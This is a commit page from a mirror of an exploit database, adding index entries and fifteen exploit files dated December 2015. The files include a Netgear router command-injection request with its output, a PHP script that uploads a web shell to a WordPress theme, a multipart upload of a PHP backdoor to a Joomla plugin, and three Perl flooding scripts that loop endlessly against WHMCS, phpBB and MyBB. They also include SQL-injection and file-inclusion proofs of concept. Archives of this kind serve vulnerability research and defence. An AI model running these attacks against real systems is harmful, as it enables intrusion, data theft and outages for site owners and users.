bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-12-25

Browse source 
15 new exploits
This commit is contained in:
Offensive Security 2015-12-25 05:03:46 +00:00
parent 2497fa0144
commit a78b7bb472
16 changed files with 1039 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

15
files.csv
View file

@ -25620,6 +25620,7 @@ id,file,description,date,author,platform,type,port
28562,platforms/hardware/webapps/28562.txt,"Hewlett-Packard 2620 Switch Series. Edit Admin Account - CSRF Vulnerability",2013-09-26,"Hubert Gradek",hardware,webapps,0
28563,platforms/multiple/webapps/28563.txt,"Posnic Stock Management System 1.02 - Multiple Vulnerabilities",2013-09-26,"Sarahma Security",multiple,webapps,0
28564,platforms/php/webapps/28564.txt,"ArticleSetup Multiple Vulnerabilities",2013-09-26,DevilScreaM,php,webapps,0
38990,platforms/php/webapps/38990.txt,"ArticleSetup Article Script 1.00 - SQL Injection Vulnerability",2015-12-15,"Linux Zone Research Team",php,webapps,80
28565,platforms/php/webapps/28565.txt,"PHP Event Calendar 1.4/1.5 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,"NR Nandini",php,webapps,0
28566,platforms/asp/webapps/28566.txt,"Snitz Forums 2000 Forum.ASP Cross-Site Scripting Vulnerability",2006-09-13,ajann,asp,webapps,0
28567,platforms/php/webapps/28567.txt,"NX5Linkx 1.0 - Multiple SQL Injection Vulnerabilities",2006-09-13,"Aliaksandr Hartsuyeu",php,webapps,0
@ -35223,8 +35224,12 @@ id,file,description,date,author,platform,type,port
38959,platforms/generator/shellcode/38959.py,"Windows XP-10 - Null-Free WinExec Shellcode (Python)",2015-12-13,B3mB4m,generator,shellcode,0
38965,platforms/php/webapps/38965.txt,"ECommerceMajor - (productdtl.php_ prodid param) SQL Injection Vulnerability",2015-12-14,"Rahul Pratap Singh",php,webapps,80
38966,platforms/php/webapps/38966.txt,"WordPress Admin Management Xtended Plugin 2.4.0 - Privilege escalation",2015-12-14,"Kacper Szurek",php,webapps,80
39096,platforms/php/webapps/39096.txt,"i-doit Pro 'objID' Parameter SQL Injection Vulnerability",2014-02-17,"Stephan Rickauer",php,webapps,0
39097,platforms/linux/remote/39097.txt,"Red Hat Piranha Remote Security Bypass Vulnerability",2013-12-11,"Andreas Schiermeier",linux,remote,0
39098,platforms/php/webapps/39098.txt,"Joomla! Wire Immogest Component 'index.php' SQL Injection Vulnerability",2014-02-17,MR.XpR,php,webapps,0
39057,platforms/php/webapps/39057.txt,"Dell Kace 1000 Systems Management Appliance DS-2014-001 Multiple SQL Injection Vulnerabilities",2014-01-13,"Rohan Stelling",php,webapps,0
38964,platforms/hardware/remote/38964.rb,"Siemens Simatic S7 1200 CPU Command Module (MSF)",2015-12-14,"Nguyen Manh Hung",hardware,remote,102
39095,platforms/php/webapps/39095.pl,"MyBB 'misc.php' Remote Denial of Service Vulnerability",2014-02-12,Amir,php,webapps,0
38968,platforms/windows/remote/38968.txt,"Microsoft Office / COM Object DLL Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132)",2015-12-14,"Google Security Research",windows,remote,0
38969,platforms/multiple/dos/38969.txt,"Adobe Flash Type Confusion in IExternalizable.readExternal When Performing Local Serialization",2015-12-14,"Google Security Research",multiple,dos,0
38970,platforms/multiple/dos/38970.txt,"Adobe Flash Type Confusion in Serialization with ObjectEncoder.dynamicPropertyWriter",2015-12-14,"Google Security Research",multiple,dos,0
@ -35292,6 +35297,7 @@ id,file,description,date,author,platform,type,port
39033,platforms/php/webapps/39033.py,"Joomla 1.5 - 3.4.5 - Object Injection RCE X-Forwarded-For Header",2015-12-18,"Andrew McNicol",php,webapps,80
39034,platforms/php/webapps/39034.html,"Ovidentia maillist Module 4.0 - Remote File Inclusion Exploit",2015-12-18,bd0rk,php,webapps,80
39035,platforms/win64/local/39035.txt,"Microsoft Windows win32k Local Privilege Escalation (MS15-010)",2015-12-18,"Jean-Jamil Khalife",win64,local,0
39099,platforms/php/webapps/39099.txt,"Rhino Cross Site Scripting and Password Reset Security Bypass Vulnerabilities",2014-02-12,Slotleet,php,webapps,0
39037,platforms/windows/dos/39037.php,"Apache 2.4.17 - Denial of Service",2015-12-18,rUnViRuS,windows,dos,0
39038,platforms/php/webapps/39038.txt,"PFSense <= 2.2.5 - Directory Traversal",2015-12-18,R-73eN,php,webapps,0
39039,platforms/multiple/dos/39039.txt,"Google Chrome - Renderer Process to Browser Process Privilege Escalation",2015-12-18,"Google Security Research",multiple,dos,0
@ -35339,3 +35345,12 @@ id,file,description,date,author,platform,type,port
39084,platforms/php/webapps/39084.txt,"Grawlix 1.0.3 - CSRF Vulnerability",2015-12-23,"Curesec Research Team",php,webapps,80
39085,platforms/php/webapps/39085.txt,"Arastta 1.1.5 - SQL Injection Vulnerabilities",2015-12-23,"Curesec Research Team",php,webapps,80
39086,platforms/php/webapps/39086.txt,"PhpSocial 2.0.0304_20222226 - CSRF Vulnerability",2015-12-23,"Curesec Research Team",php,webapps,80
39087,platforms/php/webapps/39087.txt,"Singapore 0.9.9 b beta Image Gallery Remote File Include And Cross Site Scripting Vulnerabilities",2014-02-05,"TUNISIAN CYBER",php,webapps,0
39088,platforms/php/webapps/39088.txt,"Joomla! Projoom NovaSFH Plugin 'upload.php' Arbitrary File Upload Vulnerability",2013-12-13,"Yuri Kramarz",php,webapps,0
39089,platforms/hardware/remote/39089.txt,"NETGEAR D6300B /diag.cgi IPAddr4 Parameter Remote Command Execution",2014-02-05,"Marcel Mangold",hardware,remote,0
39090,platforms/php/webapps/39090.php,"WordPress Kiddo Theme Arbitrary File Upload Vulnerability",2014-02-05,"TUNISIAN CYBER",php,webapps,0
39091,platforms/php/webapps/39091.pl,"WHMCS 'cart.php' Denial of Service Vulnerability",2014-02-07,Amir,php,webapps,0
39092,platforms/php/webapps/39092.pl,"phpBB <= 3.0.8 Remote Denial of Service Vulnerability",2014-02-11,Amir,php,webapps,0
39094,platforms/php/webapps/39094.txt,"Rips Scanner 0.5 - (code.php) Local File Inclusion",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80
39100,platforms/php/webapps/39100.txt,"WordPress NextGEN Gallery Plugin 'jqueryFileTree.php' Directory Traversal Vulnerability",2014-02-19,"Tom Adams",php,webapps,0
39101,platforms/php/webapps/39101.php,"MODx Evogallery Module 'uploadify.php' Arbitrary File Upload Vulnerability",2014-02-18,"TUNISIAN CYBER",php,webapps,0

Can't render this file because it is too large.

54
platforms/hardware/remote/39089.txt Executable file
View file

@ -0,0 +1,54 @@
source: http://www.securityfocus.com/bid/65444/info
The Netgear D6300B router is prone to the following security vulnerabilities:
1. Multiple unauthorized-access vulnerabilities
2. A command-injection vulnerability
3. An information disclosure vulnerability
An attacker can exploit these issues to gain access to potentially sensitive information, execute arbitrary commands in the context of the affected device, and perform unauthorized actions. Other attacks are also possible.
Netgear D6300B 1.0.0.14_1.0.14 is vulnerable; other versions may also be affected.
######## REQUEST: #########
###########################
POST /diag.cgi?id=991220771 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/DIAG_diag.htm
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
ping=Ping&IPAddr1=192&IPAddr2=168&IPAddr3=0&IPAddr4=1;ls&host_name=&ping_IPAddr=192.168.0.1
######## RESPONSE: ########
###########################
HTTP/1.0 200 OK
Content-length: 6672
Content-type: text/html; charset="UTF-8"
Cache-Control:no-cache
Pragma:no-cache
<!DOCTYPE HTML>
<html>
[...]
<textarea name="ping_result" class="num" cols="60" rows="12" wrap="off" readonly>
bin
cferam.001
data
dev
etc
include
lib
linuxrc
mnt
opt
&lt;/textarea&gt;
[...]

10
platforms/linux/remote/39097.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/65587/info
Red Hat Piranha is prone to a remote security bypass vulnerability.
An attacker can exploit this issue to gain unauthorized access to the restricted pages of the application, this may lead to further attacks.
Red Hat Piranha 0.8.6 is vulnerable; other versions may also be affected.
curl -d'' -I http://www.example.com:3636/secure/control.php
wget -qO- --post-data='' http://www.example.com3636/secure/control.php

447
platforms/php/webapps/38990.txt Executable file
View file

@ -0,0 +1,447 @@
########################################################################################
#______________________________________________________________________________________
# Exploit Title : Article Script SQL Injection Vulnerability
# Exploit Author : Linux Zone Research Team
# Vendor Homepage: http://articlesetup.com/
# Google Dork : inurl:/article.php?id= intext:Powered By Article Marketing
# Software Link : http://www.ArticleSetup.com/downloads/ArticleSetup-Latest.zip
# Date : 15-December-2015
# Version : (Version 1.00)
# CVE : NONE
# Tested On : Linux - Chrome
# Category : Web Application
# MY HOME : http://linux-zone.org/Forums - research@linux-zone.org
#______________________________________________________________________________________
#######################################################################################
#
# localHost/article.php?id=SQL
#______________________________________________________________________________________
## Vulnerability Code
<?php
include('config.php');
//Create site settings variables
$sitequery = 'select * from settings;';
$siteresult = mysql_query($sitequery,$connection) or die(mysql_error());
$siteinfo = mysql_fetch_array($siteresult);
$siteurl = $siteinfo['url'];
$article = $_GET['id'];
if (!is_numeric($article)) {
header('Location: '.$siteurl);
}
else
{
$sitequery = 'select * from settings;';
$siteresult = mysql_query($sitequery,$connection) or die(mysql_error());
//Create site settings variables
$siteinfo = mysql_fetch_array($siteresult);
$sitetitle = $siteinfo['title'];
$siteurl = $siteinfo['url'];
$sitecomments = $siteinfo['comments'];
$commentmod = $siteinfo['commentmod'];
$query = "select * from articles where status=0 and id = ".$article;
$articleresults = mysql_query($query,$connection) or die(mysql_error());
$num_results = mysql_num_rows($articleresults);
$articleinfo = mysql_fetch_array($articleresults);
if (!$num_results) {
header('Location: '.$siteurl);
}
//Get article info
$id = $articleinfo['id'];
$authorid = $articleinfo['authorid'];
$date = strtotime($articleinfo['date']);
$artdate = date('m/d/y', $date);
$categoryid = $articleinfo['categoryid'];
$title = stripslashes($articleinfo['title']);
$body = stripslashes($articleinfo['body']);
$resource = $articleinfo['resource'];
//Meta Info
$cathead = 0;
$metatitle = $title." - ";
include('header.php');
include('sidebar.php');
if ($seourls == 1) { $scrubtitle = generate_seo_link($title); }
// Setup the article template
$articletemp = new Template("templates/".$template."/article.tpl");
// get author info
$authorquery = "select * from authors where id=".$authorid;
$authorresult = mysql_query($authorquery,$connection) or die(mysql_error());
$authorinfo = mysql_fetch_array($authorresult);
$authorname = $authorinfo['displayname'];
$authorbio = $authorinfo['bio'];
$gravatar = $authorinfo['gravatar'];
if ($seourls == 1) { $scrubauthor = generate_seo_link($authorname); }
// get category info
$catquery = "select * from categories where id=".$categoryid;
$catresult = mysql_query($catquery,$connection) or die(mysql_error());
$catinfo = mysql_fetch_array($catresult);
$categoryname = $catinfo['name'];
$catparent = $catinfo['parentid'];
if ($seourls == 1) { $scrubcatname = generate_seo_link($categoryname); }
// if the category doesn't have a parent
if ($catparent == NULL) {
if ($seourls == 1) { // With SEO URLS
$displaycat = "<a href=\"".$siteurl."/category/".$categoryid."/"
.$scrubcatname."/\"><b>".$categoryname."</b></a>";
} else {
$displaycat = "<a href=\"".$siteurl."/category.php?id=".$categoryid
."\"><b>".$categoryname."</b></a>";
}
// if the category DOES have a parent
} else {
$query = "select * from categories where id=".$catparent;
$result = mysql_query($query,$connection) or die(mysql_error());
$info = mysql_fetch_array($result);
$parentname = $info['name'];
if ($seourls == 1) { $scrubparent = generate_seo_link($parentname); }
if ($seourls == 1) { // With SEO URLS
$displaycat = "<a href=\"".$siteurl."/category/".$catparent."/"
.$scrubparent."/\"><b>".$parentname."</b></a> >
<a href=\"".$siteurl."/category/".$categoryid."/"
.$scrubcatname."/\"><b>".$categoryname."</b></a>";
} else {
$displaycat = "<a href=\"".$siteurl."/category.php?id=".$catparent
."\"><b>".$parentname."</b></a> >
<a href=\"".$siteurl."/category.php?id=".$categoryid
."\"><b>".$categoryname."</b></a>";
}
}
// Add a view to this article
$query = "select * from articleviews where articleid = ".$article;
$results = mysql_query($query,$connection) or die(mysql_error());
$viewinfo = mysql_fetch_array($results);
if ($viewinfo == NULL) {
$sql = "INSERT INTO articleviews VALUES (".$article.", 1)";
$query = mysql_query($sql);
} else {
$totalviews = $viewinfo['views'];
$totalviews++;
$sql = "UPDATE articleviews SET views=".$totalviews." WHERE `articleid`=".$article."";
$query = mysql_query($sql);
}
if ($seourls == 1) { // With SEO URLS
$authorlink = "<a href=\"".$siteurl."/profile/".$authorid."/".$scrubauthor."/\"><b>".$authorname."</b></a>";
} else {
$authorlink = "<a href=\"".$siteurl."/profile.php?a=".$authorid."\"><b>".$authorname."</b></a>";
}
// Setup all template variables for display
$articletemp->set("authorname", $authorname);
$articletemp->set("authorlink", $authorlink);
$articletemp->set("date", $artdate);
$articletemp->set("displaycat", $displaycat);
$articletemp->set("views", $totalviews);
$articletemp->set("title", $title);
$articletemp->set("body", $body);
$articletemp->set("gravatar", $gravatar);
$articletemp->set("resource", $resource);
// For the adcode
$query = "select * from adboxes where id=1;";
$result = mysql_query($query,$connection) or die(mysql_error());
$info = mysql_fetch_assoc($result);
$articletemp->set("250adcode", stripslashes($info['adcode']));
// Outputs the homepage template!
echo $articletemp->output();
//Displays the comments -- if admin has them enabled
if($sitecomments == 0) {
echo "<br/><h2>Comments</h2>";
require_once 'comments/classes/Comments.class.php';
/* Article ID which shows the comments */
$post_id = $article;
/* Level of hierarchy comments. Infinit if declared NULL */
$level = NULL;
/* Number of Supercomments (level 0) to display per page */
$supercomments_per_page = 10000;
/* Moderate comments? */
if ($commentmod == 0) {
$moderation = true;
} else {
$moderation = false;
}
# Setup db config array #
$db_config = array("db_name" => $db_name,
"db_user" => $dbusername,
"db_pass" => $dbpassword,
"db_host" => $server );
# Create Object of class comments
$comments = new Comments($post_id, $level, $supercomments_per_page, $moderation, $db_config);
# Display comments #
echo $comments->getComments();
}
include('rightsidebar.php');
include('obinclude.php');
}
?>
#######################################
#
# Hassan Shakeri - Mohammad Habili
#
# Twitter : @ShakeriHassan - Fb.com/General.BlackHat
##########################################################

9
platforms/php/webapps/39087.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/65420/info
Singapore Image Gallery is prone to a remote file-include vulnerability and a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to obtain potentially sensitive information, execute arbitrary script code in the context of the web server process, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site or steal cookie-based authentication credentials and launch other attacks.
Singapore 0.9.9b and 0.9.10 are vulnerable; other versions may also be vulnerable.
http://www.example.com/thumb.php?gallery=./00000000000-764&height=100&image=[File Upload]

36
platforms/php/webapps/39088.txt Executable file
View file

@ -0,0 +1,36 @@
source: http://www.securityfocus.com/bid/65438/info
Projoom NovaSFH plugin for Joomla! is prone to an arbitrary-file-upload vulnerability because it fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to upload arbitrary files; this can result in arbitrary code execution within the context of the vulnerable application.
Projoom NovaSFH Plugin 3.0.2 is vulnerable; other versions may also be affected.
POST /administrator/components/com_novasfh/views/upload.php?action=upload&dest=L3Zhci93d3cvaHRtbA== HTTP/1.1
Host: <IP>
Proxy-Connection: keep-alive
Content-Length: 513
Origin: <originl>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36
Content-Type: multipart/form-data; boundary=----------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2
Accept: */*
DNT: 1
Referer: http://<host>/administrator/index.php?option=com_novasfh&c=uploader
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
------------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2
Content-Disposition: form-data; name="Filename"
php_backdoor.php
------------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2
Content-Disposition: form-data; name="Filedata"; filename="php_backdoor3.php"
Content-Type: application/octet-stream
[PHP_CODE]
------------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2
Content-Disposition: form-data; name="Upload"
Submit Query
------------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2--

53
platforms/php/webapps/39090.php Executable file
View file

@ -0,0 +1,53 @@
source: http://www.securityfocus.com/bid/65460/info
The Kiddo theme for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to sufficiently sanitize file extensions.
An attacker can exploit this issue to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access to the application; other attacks are also possible.
<?php
*/
[+] Author: TUNISIAN CYBER
[+] Exploit Title: Kidoo WP Theme File Upload Vulnerability
[+] Date: 05-02-2014
[+] Category: WebApp
[+] Google Dork: :(
[+] Tested on: KaliLinux
[+] Vendor: n/a
[+] Friendly Sites: na3il.com,th3-creative.com
Kiddo WP theme suffers from a File Upload Vulnerability
+PoC:
site/wp-content/themes/kiddo/app/assets/js/uploadify/uploadify.php
+Shell Path:
site/3vil.php
ScreenShot:
http://i.imgur.com/c62cWHH.png
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
E4A Members:
Gastro-DZ
*/
echo "=============================================== \n";
echo " Kiddo WP Theme File Upload Vulnerability\n";
echo " TUNISIAN CYBER \n";
echo "=============================================== \n\n";
$uploadfile="cyber.php";
$ch = curl_init("site-content/themes/kiddo/app/assets/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

80
platforms/php/webapps/39091.pl Executable file
View file

@ -0,0 +1,80 @@
source: http://www.securityfocus.com/bid/65470/info
WHMCS is prone to a denial-of-service vulnerability.
Successful exploits may allow attackers to cause denial-of-service condition, denying service to legitimate users.
WHMCS 5.12 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
#################################
#
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@
#
#####################################
#####################################
# Iranian Exploit DataBase
# WHMCS Denial of Service Vulnerability
# Test on Whmcs 5.12
# Vendor site : www.whmcs.com
# Code Written By Amir - iedb.team () gmail com - o0_shabgard_0o () yahoo com
# Site : Www.IeDb.Ir/acc - Www.IrIsT.Ir
# Fb Page : https://www.facebook.com/iedb.ir
# Greats : Medrik - Bl4ck M4n - ErfanMs - TaK.FaNaR - F () riD - N20 - Bl4ck N3T - 0x0ptim0us - 0Day
# E2MA3N - l4tr0d3ctism - H-SK33PY - sole sad - r3d_s0urc3 - Dr_Evil - z3r0 - Mr.Zer0 - one alone hacker
# DICTATOR - dr.koderz - E1.Coders - Security - ARTA - ARYABOD - Behnam Vanda - C0dex - Dj.TiniVini
# Det3cT0r - yashar shahinzadeh And All Members In IeDb.Ir/acc
#####################################
use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<10; $i--)
{
$data = "ajax=1&a=domainoptions&sld=saddddd&tld=saasssssssssss&checktype=owndomain";
$len = length $data;
$foo = "POST ".$dir."cart.php HTTP/1.1\r\n".
"Accept: * /*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+" ;
}
print "\n\n";
system('ping $host');
sub usage {
print "################################################# \n";
print "## WHMCS Denial of Service Vulnerability\n";
print "## Discoverd By Amir - iedb.team () gmail com - Id : o0_shabgard_0o \n";
print "## Www.IeDb.Ir/acc - Www.IrIsT.Ir \n";
print "################################################# \n";
print "## [host] [path] \n";
print "## http://host.com /whmcs/\n";
print "################################################# \n";
exit();
};
#####################################
# Archive Exploit = http://www.iedb.ir/exploits-1300.html
#####################################

79
platforms/php/webapps/39092.pl Executable file
View file

@ -0,0 +1,79 @@
source: http://www.securityfocus.com/bid/65481/info
phpBB is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
###########################
# Phpbb Forum Denial of Service Vulnerability
###########################
#!/usr/bin/perl
# Iranian Exploit DataBase
# Phpbb Forum Denial of Service Vulnerability
# Version: All Version
# Vendor site : http://www.phpbb.com
# Code Written By Amir - iedb.team@gmail.com - o0_iedb_0o@yahoo.com
# Site : Www.IeDb.Ir - Www.IrIsT.Ir
# Fb Page :
https://www.facebook.com/pages/Exploit-And-Security-Team-iedbir/199266860256538
# Greats : TaK.FaNaR - ErfanMs - Medrik - F@riD - Bl4ck M4n - 0x0ptim0us
- 0Day - Dj.TiniVini - E2MA3N
# l4tr0d3ctism - H-SK33PY - Noter - r3d_s0urc3 - Dr_Evil And All
Members In IeDb.Ir/acc
#####################################
use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<10; $i--)
{
$data =
"securitytoken=guest&do=process&query=%DB%8C%D8%B3%D8%A8%D9%84%D8%B3%DB%8C%D9%84%D8%B3%DB%8C%D8%A8%D9%84%0%0%0%0%0%0%0%0%0%0&submit.x=0&submit.y=0";
$len = length $data;
$foo = "POST ".$dir."search.php?do=process HTTP/1.1\r\n".
"Accept: * /*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+" ;
}
print "\n\n";
system('ping $host');
sub usage {
print "\n";
print "################################################# \n";
print "## Phpbb Forum Denial of Service Vulnerability\n";
print "## Discoverd By Amir - iedb.team@gmail.com - Id : o0_iedb_0o \n";
print "## Www.IeDb.Ir - Www.IrIsT.Ir \n";
print "################################################# \n";
print "## [host] [path] \n";
print "## http://host.com /forum/\n";
print "################################################# \n";
print "\n";
exit();
};
#####################################
# Archive Exploit = http://www.iedb.ir/exploits-868.html
#####################################
###########################
# Iranian Exploit DataBase = http://IeDb.Ir [2013-11-17]
###########################

53
platforms/php/webapps/39094.txt Executable file
View file

@ -0,0 +1,53 @@
================================================================================
# Rips Scanner 0.5 - (code.php) Local File Inclusion
================================================================================
# Vendor Homepage: https://github.com/robocoder/rips-scanner
# Date: 24/12/2015
# Software Link: https://github.com/robocoder/rips-scanner/archive/master.zip
# Version : 0.5
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
# Source: http://ehsansec.ir/advisories/rips-code-lfi.txt
================================================================================
# Vulnerable File : code.php
# Vulnerable Code:
102 $file = $_GET['file'];
103 $marklines = explode(',', $_GET['lines']);
104 $ext = '.'.pathinfo($file, PATHINFO_EXTENSION);
105
106
107 if(!empty($file) && is_file($file) && in_array($ext, $FILETYPES))
108 {
109 $lines = file($file);
110
111 // place line numbers in extra table for more elegant copy/paste
without line numbers
112 echo '<tr><td><table>';
113 for($i=1, $max=count($lines); $i<=$max;$i++)
114 echo "<tr><td class=\"linenrcolumn\"><span
class=\"linenr\">$i</span><A id='".($i+2).'\'></A></td></tr>';
115 echo '</table></td><td id="codeonly"><table id="codetable" width="100%">';
116
117 $in_comment = false;
118 for($i=0; $i<$max; $i++)
119 {
120 $in_comment = highlightline($lines[$i], $i+1, $marklines, $in_comment);
121 }
122 } else
123 {
124 echo '<tr><td>Invalid file specified.</td></tr>';
125 }
# PoC :
http://localhost/rips/windows/code.php?file=/var/www/html/index.php
Vulnerable Parameter : file
================================================================================
# Discovered By : Ehsan Hosseini (EhsanSec.ir)
================================================================================

82
platforms/php/webapps/39095.pl Executable file
View file

@ -0,0 +1,82 @@
source: http://www.securityfocus.com/bid/65545/info
MyBB is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
MyBB 1.6.12 is vulnerable; other versions may be also be affected.
# Mybb All Version Denial of Service Vulnerability
#!/usr/bin/perl
# Iranian Exploit DataBase
# Mybb All Version Denial of Service Vulnerability
# Test on Mybb 1.6.12
# Vendor site : www.mybb.com
# Code Written By Amir - iedb.team () gmail com - o0_shabgard_0o ()
yahoo com
# Site : Www.IeDb.Ir/acc - Www.IrIsT.Ir
# Fb Page : https://www.facebook.com/iedb.ir
# Greats : Medrik - Bl4ck M4n - ErfanMs - TaK.FaNaR - F () riD - N20 -
Bl4ck N3T - 0x0ptim0us - 0Day
# E2MA3N - l4tr0d3ctism - H-SK33PY - sole sad - r3d_s0urc3 - Dr_Evil -
z3r0 - Mr.Zer0 - one alone hacker
# DICTATOR - dr.koderz - E1.Coders - Security - ARTA - ARYABOD - Behnam
Vanda - C0dex - Dj.TiniVini
# Det3cT0r - yashar shahinzadeh And All Members In IeDb.Ir/acc
#####################################
use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<10; $i--)
{
$data =
"forums%5B%5D=all&version=rss2.0&limit=1500000&make=%D8%AF%D8%B1%DB%8C%D8%A7%D9%81%D8%AA+%D9%84%DB%8C%D9%86%DA%A9+%D9%BE%DB%8C%D9%88%D9%86%D8%AF+%D8%B3%D8%A7%DB%8C%D8%AA%DB%8C";
$len = length $data;
$foo = "POST ".$dir."misc.php?action=syndication HTTP/1.1\r\n".
"Accept: * /*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+" ;
}
print "\n\n";
system('ping $host');
sub usage {
print "################################################# \n";
print "## Mybb All Version Denial of Service Vulnerability\n";
print "## Discoverd By Amir - iedb.team () gmail com - Id :
o0_shabgard_0o \n";
print "## Www.IeDb.Ir/acc - Www.IrIsT.Ir \n";
print "################################################# \n";
print "## [host] [path] \n";
print "## http://host.com /mybb/\n";
print "################################################# \n";
exit();
};
#####################################
# Archive Exploit = http://www.iedb.ir/exploits-1332.html
#####################################
###########################
# Iranian Exploit DataBase = http://IeDb.Ir [2014-02-12]
###########################

9
platforms/php/webapps/39096.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/65557/info
i-doit Pro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
i-doit Pro 1.2.4 and prior are vulnerable.
http://www.example.com/?objID=[SQL Injection]

7
platforms/php/webapps/39098.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/65606/info
Wire Immogest component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_wire_immogest&view=object&id=[SQL Injection]

79
platforms/php/webapps/39099.txt Executable file
View file

@ -0,0 +1,79 @@
source: http://www.securityfocus.com/bid/65628/info
Rhino is prone to a cross-site scripting vulnerability and security-bypass vulnerability .
An attacker can exploit these issues to execute arbitrary script code in the context of the vulnerable site, potentially allowing the attacker to steal cookie-based authentication credentials, bypass security restrictions to obtain sensitive information, or perform unauthorized actions. Other attacks may also be possible.
Rhino 4.1 is vulnerable; other versions may also be affected.
==========================
